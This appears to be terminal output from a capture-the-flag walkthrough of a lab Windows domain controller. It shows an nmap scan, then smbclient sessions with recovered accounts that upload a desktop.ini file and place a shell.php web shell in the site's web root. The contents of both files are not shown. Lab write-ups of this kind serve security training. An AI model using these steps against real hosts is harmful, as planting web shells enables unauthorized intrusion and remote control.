$ nmap -sC -sV -Pn 10.10.11.187 Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-07 13:39 CST Nmap scan report for 10.10.11.187 Host is up (0.21s latency). Not shown: 988 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1) |_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1 |_http-title: g0 Aviation | http-methods: |_ Potentially risky methods: TRACE 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-11-07 12:42:13Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 219.19 seconds
└─$ smbclient //10.10.11.187/shared -U s.moon Password for [WORKGROUP\s.moon]: Try "help" to get a list of possible commands. smb: \> put desktop.ini putting file desktop.ini as \desktop.ini (0.1 kb/s) (average 0.1 kb/s) smb: \>
└─$ smbclient //10.10.11.187/web -U c.bum Password for [WORKGROUP\c.bum]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Mon Nov 7 21:38:38 2022 .. D 0 Mon Nov 7 21:38:38 2022 flight.htb D 0 Mon Nov 7 21:37:00 2022 school.flight.htb D 0 Mon Nov 7 21:37:00 2022 shell.php A 42 Mon Nov 7 21:38:38 2022
5056511 blocks of size 4096. 1028784 blocks available smb: \> cd school.flight.htb smb: \school.flight.htb\> put shell.php putting file shell.php as \school.flight.htb\shell.php (0.1 kb/s) (average 0.0 kb/s) smb: \school.flight.htb\>